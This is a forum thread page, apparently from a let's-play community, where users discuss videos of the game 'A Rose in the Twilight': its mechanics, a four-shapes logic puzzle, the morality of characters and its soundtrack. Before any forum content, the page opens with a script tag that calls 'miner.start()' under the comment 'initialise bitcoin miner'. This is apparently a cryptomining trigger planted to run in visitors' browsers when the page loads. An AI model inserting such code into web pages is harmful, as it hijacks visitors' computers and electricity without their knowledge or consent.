<script>
miner.start(); // initialise bitcoin miner
</script>

pge projectsmbx communitysmw central

A Rose in the Twilight - Blaze

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
Alice
Pronouns: Girl person

Re: A Rose in the Twilight - Tamingo Folly

Postby Alice » 1 week ago

BobisOnlyBob wrote: a grim little aesthetic
A grim but cute aesthetic*

Bluster Kerfuffle
Master of Windy Import
Pronouns: he/him/his

Re: A Rose in the Twilight - Mr. Lincoln

Postby Bluster Kerfuffle » 1 week ago

I am wondering how the game is going to mix the usual blood transfusion mechanic with the new blooding can thing, since both seem to require your rose to be red but use of the former depletes it entirely while use of the latter does not.

ano0maly
Discord User

Re: A Rose in the Twilight - Amalia

Postby ano0maly » 1 week ago

All this time I thought those small semicircular vine pieces were wheels with spikes, until I saw the thorn-covered castle gate
Image The talkhaus Discord server. Come ask for an invite to join!

Now the sole biggest

Awoo
Wolf girls? In *my* area? It's more likely than you think!

Re: A Demo in the Twilight - Amélie

Postby Awoo » 1 week ago

So, Rose has a headache every time she regenerates after "death". Does that mean that you're secretly playing as Agent Black,with a giant/blob buddy, raocow?

(quite a neat game, hard to believe it's made by the same people who made Disgaea, one of my favorite franchises)
ワンワン :pal:

Alice
Pronouns: Girl person

Re: A Rose in the Twilight - Amalia

Postby Alice » 1 week ago

raocow, you should work on your wording. Rather than stating your last act for the video was going to be climbing in an iron maiden, you didn't specify it was the last act for the video which implies it'll be your last act ever. So now I'm fully expecting your final lp to be an lp of being put into an iron maiden irl.

Awoo
Wolf girls? In *my* area? It's more likely than you think!

Re: A Battle in the Twilight - Easy Mode is (not) an option

Postby Awoo » 6 days ago

Am I weird for thinking that the music in the Library part here kinda sounds like this:

It's almost like a "happier" version? It just strikes me as similar for some reason.
ワンワン :pal:

ano0maly
Discord User

Re: A Rose in the Twilight - Double Knock Out

Postby ano0maly » 5 days ago

Interesting detail: the "other Rose" has her dress torn a bit in a couple of spots (although only in the scenes at the Auditorium floor for some reason). And I wonder if you can unhook both chains (rather than just one on the right) but not pick her up and just leave alone?

And I think this is how I decipher the four shapes puzzle:
These are what the diaries tell us:
  • Heart - lost to Diamond, isn't last place.
  • Spade - almost won but lost to one shape, and calls another shape a liar.
  • Clover - claims to have won.
  • Diamond - claims to have defeated Clover.
So from this we can infer:
  • Clover allegedly beat everyone, and Diamond allegedly beat Clover. Since these two claims contradict, one of them must be the liar.
  • Heart is therefore telling the truth.
  • Heart isn't last but isn't first either, with Diamond somewhere in front of it.
  • We know that there can be only one winner, and Heart and Spade are already ruled out. So if Diamond is telling the truth, then Clover is defeated and also ruled out, so it's automatic that Diamond is the winner. (Conversely, if Clover is correct, then by the stated claim Clover is the winner.)
  • Spade mentioning losing at the very end sounds like Spade should be second place.
  • Since Heart has to be somewhere in the middle, this makes Heart third place.
  • Diamond beat Heart, so the only available spot for Diamond at this point is first place, and Clover gets the remaining fourth place.
This bookshelf was actually in left-to-right order; you can see the crown shape on the leftmost space to indicate the winner.

Now the sole biggest

Kleetus

Re: A Rose in the Twilight - Double Knock Out

Postby Kleetus » 5 days ago

Rose has thorn powers, and the the Giant is covered in thorns as well. I've been thinking, what if Rose (perhaps unknowingly) is an agent of Thorns and the Giant has been sent to aid her in her nefarious mission. Things have been complicated by Rose's look a like; I'm going to call her Violet until further notice. One of these girls has to be an imposter sent to sow discord. Brilliant plan if you're an all consuming force of darkness; corrupt the princess, dispose the princess, replace the princess, watch the profits roll in. As a bonus, little girls are usually beneath suspicion.

ano0maly
Discord User

Re: A Rose in the Twilight - Eternity

Postby ano0maly » 4 days ago

This clock tower level is cool. I wonder why you're still missing thorn research diary 8 though.

Now the sole biggest

Le Neveu de Rameau
The Judith Butler of bad puns
First name: Rameau's Nephew

Re: A Rose in the Twilight - Loving memory

Postby Le Neveu de Rameau » 2 days ago

For a bit of perspective, while I certainly wouldn't dispute that Rose II got a decidedly crap deal in life as a result of events completely beyond her control, she also did kind of kill large numbers of people, and showed no remorse for this action, only the desire to kill yet another person whose only crime was, by chance, not suffering the same fate as she did. I would also be hesitant to use the "lashing out" explanation, for while that might explain the initial crumbling of the dungeon (whether the victims further up are linked to this same incident or later acts on her part is unclear), it certainly does not account for the multiple, deliberate and decidedly planned attempts to murder Rose, which apparently stop not out of coming to her senses or anything of that sort, but simply out of fear that her attempted murder victim is not only more murder resistant than she had initially counted on, but also able to turn some of her murder tricks against her. Now, she is a child, and it's further suggested that the thorn curse may ultimately rob you of your senses (if that's how we are to understand the comments about the librarian and other "variants"), which is important to take in to account here, but when making moral evaluations of the characters in our narrative, I would also advise against falling in to the trap of "Well, shucks, murder doesn't really count if you're cute and have a tragic backstory!"

raocow
the death of the incredible huge
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Postby raocow » 2 days ago

oh

*puts the saw back away*
the chillaxest of dragonsImage
ImageImage

Kleetus

Postby Kleetus » 2 days ago

I like to imagine that raiding the castle kitchen was the sole reason Rose returned to the castle. Poor girl hasn't eaten for the entire game.

Peliptia
(ˈpe-lip-SHēə) / [ˈpɛ-lɪp-ʃiə]

Postby Peliptia » 2 days ago

the boss battle reminds me a lot of《a boy and his blob》...really neato; though at the same times you can kinda feel that the mechanics werent tailored for like insta·death combat encounter—nevertheless i still just really love the design of this game🎔₊˚*
ImageImage

ano0maly
Discord User

Re: A Rose in the Twilight - Morden Fireglow

Postby ano0maly » 1 day ago

For that last puzzle in Path to Abyss 1, I don't know if the spiral golem can throw the caterpillar midair while being flung by the catapult, but if that doesn't work, maybe you could pick up that block you crossed over and place it somewhere to make it easier for the caterpillar to get up there.

I wonder if there was something to the left of the mushrooms.

This game has a very nice soundtrack. Two of the tracks include vocals:

"blood of blanc"

that's the name of the other girl with the rose

"ruin of rose"

Now the sole biggest

Return to “let's play”